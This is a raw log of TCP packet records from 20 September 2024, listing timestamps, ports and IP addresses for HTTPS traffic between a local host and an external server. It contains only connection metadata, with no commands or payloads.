Sep 20, 2024 11:07:42.231487989 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.231523037 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.247766018 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.247782946 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.247838974 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.247843027 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.247854948 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.247874022 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.263412952 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.263431072 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.263508081 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.263511896 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.263556004 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.273153067 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.273169041 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.273220062 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.273225069 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.273267031 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.273286104 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.283770084 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.283786058 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.283849001 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.283853054 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.283886909 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.292212963 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.292232037 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.292299032 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.292305946 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.292314053 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.292347908 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.301522017 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.301537037 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.301597118 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.301600933 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.301637888 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.310216904 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.310231924 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.310308933 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.310313940 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.310347080 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.320987940 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.321002960 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.321065903 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.321069956 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.321106911 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.335093021 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.335108042 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.335158110 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.335163116 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.335181952 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.335196972 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.348150969 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.348167896 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.348234892 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.348238945 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.348273039 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.361690998 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.361706972 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.361752987 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.361757040 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.361788034 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.361808062 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.371236086 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.371267080 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.371299028 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.371304989 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.371331930 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.371350050 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.381618977 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.381637096 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.381839037 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.381844044 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.381895065 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.391220093 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.391241074 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.391299009 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.391304016 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.391334057 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.398663044 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.398678064 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.398736000 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.398739100 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.398773909 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.407536983 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.407553911 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.407614946 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.407618999 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.407653093 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.427781105 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.427795887 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.427865982 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.427870035 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.427903891 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.440639973 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.440654039 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.440715075 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.440718889 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.440754890 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.454701900 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.454716921 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.454766989 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.454771042 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.454806089 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.463695049 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.463710070 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.463785887 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.463788986 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.463820934 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.474162102 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.474176884 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.474275112 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.474283934 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.474319935 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.483699083 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.483715057 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.483803034 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.483807087 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.483855963 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.491102934 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.491120100 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.491177082 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.491182089 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.491216898 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.500114918 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.500130892 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.500202894 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.500206947 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.500236034 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.519844055 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.519862890 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.520076990 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.520081043 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.520124912 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.533085108 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.533102989 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.533198118 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.533201933 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.533241034 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.547245979 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.547261953 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.547344923 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.547349930 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.547383070 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.556092978 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.556124926 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.556188107 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.556191921 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.556231022 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.566570044 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.566592932 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.566689968 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.566694021 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.566729069 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.576013088 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.576035023 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.576113939 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.576117992 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.576155901 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.583492994 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.583528996 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.583579063 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.583580971 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.583617926 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.583906889 CEST	49749	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.583921909 CEST	443	49749	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.584876060 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.584897995 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:42.584964037 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.585242987 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:42.585251093 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.229352951 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.229454041 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.229917049 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.229923964 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.231786013 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.231792927 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.656814098 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.656845093 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.656862020 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.656898975 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.656929970 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.656941891 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.656994104 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.688051939 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.688088894 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.688179970 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.688208103 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.688252926 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.755362988 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.755408049 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.755523920 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.755548954 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.755599976 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.784513950 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.784548998 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.784694910 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.784723043 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.784773111 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.822545052 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.822609901 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.822659016 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.822732925 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.822770119 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.822797060 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.852791071 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.852809906 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.852936983 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.852957964 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.853009939 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.871944904 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.871989965 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.872033119 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.872056007 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.872093916 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.872117043 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.889868021 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.889911890 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.889962912 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.889980078 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.890033007 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.890054941 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.907202959 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.907263041 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.907294035 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.907309055 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.907342911 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.907365084 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.921672106 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.921720028 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.921802998 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.921813011 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.921860933 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.938762903 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.938781023 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.938893080 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.938915014 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.938981056 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.952305079 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.952322960 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.952400923 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.952409029 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.952452898 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.967539072 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.967583895 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.967660904 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.967670918 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.967715025 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.967765093 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.978998899 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.979046106 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.979108095 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.979115963 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.979144096 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.979167938 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.987732887 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.987770081 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.987871885 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.987903118 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.987972021 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.997343063 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.997370005 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.997461081 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:43.997478962 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:43.997523069 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.006812096 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.006836891 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.006912947 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.006918907 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.006963968 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.013345003 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.013389111 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.013472080 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.013500929 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.013551950 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.022692919 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.022720098 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.022805929 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.022814989 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.022859097 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.033948898 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.033966064 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.034064054 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.034087896 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.034140110 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.046895027 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.046911001 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.046987057 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.047009945 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.047065020 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.060611010 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.060672045 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.060739994 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.060761929 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.060791969 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.060816050 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.071691036 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.071737051 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.071808100 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.071870089 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.071907043 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.071929932 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.079804897 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.079870939 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.080068111 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.080069065 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.080136061 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.080221891 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.088964939 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.089015961 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.089099884 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.089122057 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.089148045 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.089174986 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.096241951 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.096306086 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.096364021 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.096369982 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.096421957 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.104460001 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.104490995 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.104559898 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.104572058 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.104598045 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.104633093 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.115309000 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.115359068 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.115410089 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.115416050 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.115459919 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.147228956 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.147253990 CEST	443	49750	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:44.147373915 CEST	49750	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:44.147381067 CEST	443	49750	116.203.165.127	192.168.2.4
